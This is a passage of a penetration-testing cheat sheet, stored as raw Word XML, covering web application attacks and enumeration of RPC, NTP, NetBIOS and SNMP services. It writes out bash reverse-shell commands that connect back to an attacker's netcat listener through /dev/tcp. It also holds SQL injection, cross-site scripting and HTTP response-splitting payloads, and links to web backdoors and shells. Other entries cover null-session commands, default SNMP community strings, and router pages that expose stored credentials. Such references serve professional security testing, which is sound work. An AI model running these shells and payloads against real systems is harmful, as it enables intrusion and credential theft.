    <w:p w14:paraId="72DA424A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DirBuster</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A2DF4FD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Wikto</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="101C5B2A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Goolag Scanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AE21826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Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC544F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Manual Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4A049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3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Default Passwords</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33B5EC75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Install Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D1978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ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407100B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http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF7513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Assorted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B3623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http://michaeldaw.org/projects/web-backdoor-compilation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698CD8E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http://open-labs.org/hacker_webkit02.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F12AF8F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE5B4CC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http://home.arcor.de/mschierlm/test/pmsh.pl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955EAA0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http://pentestmonkey.net/tools/perl-reverse-shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016C0E9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http://freeworld.thc.org/download.php?t=r&amp;f=rwwwshell-2.0.pl.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F37AB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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8AB8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http://php.spb.ru/remview/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D995872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http://pentestmonkey.net/tools/php-reverse-shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE2F7AA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http://pentestmonkey.net/tools/php-findsock-shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443FE1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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7871B4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http://matahari.sourceforge.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAEF80E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TCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F1FFC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http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&amp;force=yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AB36F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Bash Connect Back Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832553B" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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GnuCitizen</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DFCA334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Atttack Box: nc -l -p Port -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DFBE1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Victim: $ exec 5&lt;&gt;/dev/tcp/IP_Address/Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03848F21" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5040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Victim: $ cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7394CC" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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Neohapsis</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6020053D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Atttack Box: nc -l -p Port -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775D8AA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Victim: $ exec 0&lt;/dev/tcp/IP_Address/Port # First we copy our connection over stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05D3FE" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5040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Victim: $ exec 1&gt;&amp;0 # Next we copy stdin to stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA26FC4" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5040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Victim: $ exec 2&gt;&amp;0 # And finally stdin to stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6B0C3" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5040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Victim: $ exec /bin/sh 0&lt;/dev/tcp/IP_Address/Port 1&gt;&amp;0 2&gt;&amp;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7D46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Method Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB2ECF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nc IP_Adress Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F7D0F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HEAD / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD9BB0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OPTIONS / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A96B7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PROPFIND / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4B3EA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TRACE / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366CBC9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PUT http://Target_URL/FILE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4A534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POST http://Target_URL/FILE_NAME HTTP/1.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6284C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Upload Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D55D5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curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B22B06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curl -u &lt;username:password&gt; -T file_to_upload &lt;Target_URL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6726E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curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" &lt;Target_URL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0A7FA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put.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4068D645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put.pl -h target -r /remote_file_name -f local_file_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F0F49A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webdav</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E48221" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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cadaver</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0760D8B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View Page Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966F58B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Hidden Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6A225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Developer Remarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E75EA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Extraneous Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27E8CB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Passwords!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A7455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Input Validation Checks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DEDD0C0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NULL or null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E1092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Possible error messages returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E7B11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' , " , ; , &lt;!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634426B2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Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D6D9B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– , = , + , "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B29F35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Used to craft SQL Injection queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392B489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‘ , &amp;, ! , ¦ , &lt; , &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E249E0C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Used to find command execution vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD007A1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"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C17A17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Basic Cross-Site Scripting Checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59758C96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%0d%0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F343B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Carriage Return (%0d) Line Feed (%0a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA377D4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 Splitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38C2EE" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="7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language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759ADFCD" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63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i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47&lt;html&gt;blah&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188B648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Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5B6E9" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="7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language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Insert undesireable content here&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006B873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%7f , %ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDEE946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byte-length overflows; maximum 7- and 8-bit values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7DF92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-1, other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938C645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Integer and underflow vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B23E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%n , %x , %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E134A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Testing for format string vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676CFB5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../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B13B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Directory Traversal Vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F003FD4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% , _, *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D7484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Wildcard characters can sometimes present DoS issues or information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8BD740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Ax1024+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD904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Overflow vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2518C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Automated table and column iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34AFD0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orderby.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C497B6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./orderby.py www.site.com/index.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A100B24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d3sqlfuzz.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74882D0E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./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27356F2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Vulnerability Scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F59810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Acunetix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33D76B70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Grendelscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A41886B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4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NStealth</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F1B5DD0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Obiwan III</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07EAF8D1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w3af</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C580DF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Specific Applications/ Server Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CA4B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Domino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE87845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dominoaudit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="635ABCD7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dominoaudit.pl [options] -h &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B72C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Joomla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713EFAA1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cms_few</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1821F77D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./cms.py &lt;site-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2039C5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joomsq</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71551FB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./joomsq.py &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AEB7EC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joomlascan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6ED2D01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./joomlascan.py &lt;site&gt; &lt;options&gt;  [options i.e. -p/-proxy &lt;host:port&gt; : Add proxy support -404 : Don't show 404 responses]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886101F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joomscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A254237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./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A005D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jscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="779CB517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jscan.pl -f hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC343B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(shell.txt required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCA576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aspaudit.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50F4542B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asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DC73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Vbulletin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE081C3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5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vbscan.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41DF0E8D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vbscan.py &lt;host&gt; &lt;port&gt; -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E02AD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vbscan.py -update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F97D5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ZyXel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49576E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zyxel-bf.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64ABE9FB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snmpwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C25EA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snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488752C8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snmpget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F952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snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89D27B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Proxy Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515CA64E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Burpsuite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A64CE3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Crowbar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3847B93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Interceptor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32997DC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Paros</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4579F18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Requester Raw</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7233025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Suru</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29EE601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WebScarab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38E9E02C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7F49D531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Generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E84B78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httpd.conf/ windows config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480AFB2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JBoss</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67E125B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JMX Console http://&lt;IP&gt;:8080/jmxconcole/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4370C675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6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War File</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="587A3C5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Joomla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469942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configuration.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166292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diagnostics.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0745E72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joomla.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2AF06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config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC12E7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Mambo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FF79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configuration.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A922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config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475DFBF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Wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69158CB5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setup-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3F25D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wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35C83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ZyXel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C4F4F6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/WAN.html (contains PPPoE ISP password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A5352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/WLAN_General.html and /WLAN.html (contains WEP key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F5B945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/rpDyDNS.html (contains DDNS credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD14F3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/Firewall_DefPolicy.html (Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD84E2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/CF_Keyword.html (Content Filter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A832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/RemMagWWW.html (Remote MGMT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC68BB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/rpSysAdmin.html (System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE9F04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/LAN_IP.html (LAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B47C2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/NAT_General.html (NAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B0D2D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/ViewLog.html (Logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1005559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/rpFWUpload.html (Tools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2087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/DiagGeneral.html (Diagnostic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC231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/RemMagSNMP.html (SNMP Passwords)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBCD8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/LAN_ClientList.html (Current DHCP Leases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6789A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Config Backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818C9E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/RestoreCfg.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A073F0B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/BackupCfg.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A80CE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Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC49B0" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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ZyXEL Config Reader</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DA39929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web server logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0837AAE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c:\winnt\system32\Logfiles\W3SVC1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA39D0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awk -F " " '{print $3,$11} filename | sort | uniq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB27B3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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BECCE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White Papers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C88434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Cross Site Request Forgery: An Introduction to a Common Web Application Weakness</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52848C24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Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42012555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Blind Security Testing - An Evolutionary Approach</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41020911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Command Injection in XML Signatures and Encryption</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0622AD31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Input Validation Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B5AE65F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 Injection Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6944C5D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Books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E66C8B6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Hacking Exposed Web 2.0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="182EAE69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7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Hacking Exposed Web Applications</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51E59FC6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The Web Application Hacker's Handbook</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="712F6085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Exploit Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196B63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Brute-force Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA3FF7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Acunetix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48D4BF9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Metasploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24C7146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w3af</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="046628EF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9" w:name="_Toc96705547"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Portmapper port 111 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5E3CFBD0" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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rpcdump.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6495541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rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC80E62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rpcinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCB47F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rpcinfo [options] IP_Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56053F62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0" w:name="_Toc96705548"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NTP Port 123 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="225D64E0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NTP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3A9C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ntpdc -c monlist IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C557A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ntpdc -c sysinfo IP_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBFFD5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ntpq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066655B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host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF1F01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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42939FA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ntpversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461B87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readlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDA5E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version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F02B3D5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55B9EA9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ntp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58687DA3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1" w:name="_Toc96705549"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NetBIOS Ports 135-139,445 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3BA8C290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NetBIOS enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CDAD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Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DA348D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enum &lt;-UMNSPGLdc&gt; &lt;-u username&gt; &lt;-p password&gt; &lt;-f dictfile&gt; &lt;hostname|ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2EFDF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Null Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1784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net use \\192.168.1.1\ipc$ "" /u:""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFFC7DC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net view \\ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2FFD6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Dumpsec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E3DA86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Smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E736F3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smbclient -L //server/share password options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D3537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Superscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="576F6256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Enumeration tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671C5189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user2sid/sid2user</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4470DBD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8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Winfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38AFD174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NetBIOS brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03280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Hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3022988A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Brutus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A42A85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Cain &amp; Abel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A420DDE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getacct</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="431AD0D2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NAT (NetBIOS Auditing Tool)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76C9D397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37C736C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Smb.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C36F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lmhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26A6E8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2" w:name="_Toc96705550"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SNMP port 161 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3BDDFD34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Default Community Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47957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public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D2349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private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F7E6F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cisco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D225D2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cable-docsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BE86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ILMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE6A7D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MIB enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F781F6B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Windows NT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A15D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.1.3.6.1.2.1.1.5 Hostnames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41042435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.1.3.6.1.4.1.77.1.4.2 Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDD5F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.1.3.6.1.4.1.77.1.2.25 Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D35BD2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.1.3.6.1.4.1.77.1.2.3.1.1 Running Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A6F80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.1.3.6.1.4.1.77.1.2.27 Share Information</w:t>
